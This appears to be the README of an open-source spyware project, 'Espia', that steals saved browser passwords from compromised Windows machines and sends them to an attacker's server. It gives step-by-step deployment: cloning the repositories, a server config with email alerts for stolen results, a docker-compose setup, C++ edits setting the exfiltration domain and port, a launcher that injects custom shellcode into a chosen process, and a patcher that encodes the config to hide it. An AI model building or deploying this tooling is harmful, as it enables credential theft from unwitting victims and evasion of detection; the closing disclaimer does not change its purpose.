The Espia Project is a simple but useful client-server spyware setup. Its main goal is to gather as much information as possible from a compromised remote machine. Currently, the Espia client retrieves the Edge, Chrome and Firefox passwords stored on the PC and provides a stealthy and fast way to conduct a brief, small-scale attack.
The Espia client is written in C++ and is available in the Espia_Client fork. The client works in two stages:
- Launcher - downloads the espia.exe file from the server and launches it.
- Espia - the actual client, which executes and collects all available plugins. At the end of the execution, the server will have all product results in the current session_id directory, which is explained in the next section.
- All products retrieved from the Espia client are rendered and created in a local directory named after a randomly generated session_id.
- final_results.json includes all data retrieved from the remote target.
- You can set up a MailGun account in order to get an email sent to your specified address when results have been retrieved.
Clone the main project and all submodules:

```shell
git clone --recurse-submodules https://github.com/tomp332/TheEspiaProject.git
```

Create your configuration template file using the following format:

```ini
[app]
SERVER_IP = 0.0.0.0
SERVER_PORT = 443
ESPIA_ENV = <prod/local>
[mailgun]
API_KEY = <Mailgun api key>
MAILGUN_DOMAIN = <Mailgun email domain>
MAILGUN_USER = <Mailgun username>
DESTINATION_EMAIL = <Destination email for results to be sent to>
```

Note: prod mode disables all debug routes, such as /docs for the Swagger application.
Note: 0.0.0.0 is meant for running inside the Docker environment, so don't change it.
- Clone and install:

```shell
git clone https://github.com/tomp332/Espia_Server.git
cd Espia_Server
pip install -r requirements.txt
```

- Certificates are located at espia_server/certs; override them with your own if you'd like, otherwise the localhost certs will be used.
Using the docker-compose.yml file you can quickly configure your own custom server:

```yaml
version: "3.8"
services:
  espia_server:
    container_name: espia_server
    restart: always
    image: ghcr.io/tomp332/espia-server:latest
    ports:
      - 443:443
    volumes:
      # Your main configuration file
      - type: bind
        source: <your main config.ini file>
        target: /server/espia_server/configs/config.ini
      # Storage for all session files that Espia receives
      - type: bind
        source: <path to all local session files storage>
        target: /server/espia_server/app/uploads
      # By default there are localhost public/private keys installed;
      # if you want production ones, override them, otherwise remove these 2 binds
      - type: bind
        source: <path to public key>
        target: /server/espia_server/certs/public_key.pem
      - type: bind
        source: <path to private key>
        target: /server/espia_server/certs/private_key.pem
```
Using the Espia_Client forked project, follow this configuration in order to compile your own version of the executable.
Note: this was written in Visual Studio 2022 with the latest C++ version.
- Espia.cpp: edit the raw configuration so that the exe file is compiled with your desired settings. This is mainly for debug purposes, since there is a script which encodes it so that it is not in plain text in the final binary (line 21 of Espia.cpp):

```cpp
static const unsigned char CONFIG_BUFFER[1000] = "{\"Domain\":\"<Your server's domain/IP>\",\"Port\":\"<Your server port>\",\"ProductsPath\":\"<Desired products path on target machine>\"}";
```
- Launcher.cpp
Note: this is optional; launching Espia.exe on its own is perfectly fine.
For the second solution attached to the Espia project, there is a Downloader executor, in case you would like your malware to be downloaded using a shellcode dropper. To create your own, edit Launcher.cpp with your own shellcode (lines 43-44):

```cpp
unsigned char buffer[] = "<Your shellcode here>";
std::string sTargetProcess = STR("<Process name you would like to inject to>");
```
- All that is left at this point is to compile and hack away!
- In Debug mode, the plain text configuration will not be encoded, so that you can properly debug the code.
- In Release mode, you can remove the configuration text and leave only empty values, so that the new configuration can be encoded and injected through a Python script available in the Espia Server. For example:

```cpp
static const unsigned char CONFIG_BUFFER[1000] = "{\"Domain\":\"\",\"Port\":\"\",\"ProductsPath\":\"\"}";
```
- The configuration patcher is available in the Espia_Server project at espia_server/app/scripts/espia_patcher.py.
This script overrides and encodes your specified JSON configuration for your Espia client. It searches for the offset where the original configuration begins and overwrites it with exactly the buffer size used in the source code. This is mainly done to hide the plain text configuration strings.
- In the Espia_Server project you will find the patch script at espia_server\app\scripts\espia_patch.py.
- Edit both variables with your own configuration: _COMPILED_MALWARE_PATH and _CONFIG.
- Run the script, and a patched copy of the Espia client will be created in the static_files directory, from where you can serve it through the server or in whatever way you want.
- Output example:

```
[+] Finished patching file: static_files / Espia.exe, offset: 1104032
```
After configuring the docker-compose.yml:

```shell
docker-compose up
```

- Override the espia_server/configs/config.ini file with the one you created in the last step, and you're all set:

```shell
python3 -m espia_server
```
- @dvbergmann David Bergmann
Feel free to open issues and contact us with any questions 👍
You shall not misuse the information to gain unauthorised access. However, you may try out these hacks on your own computer at your own risk. Performing hack attempts (without permission) on computers that you do not own is illegal.
Enjoy 🤘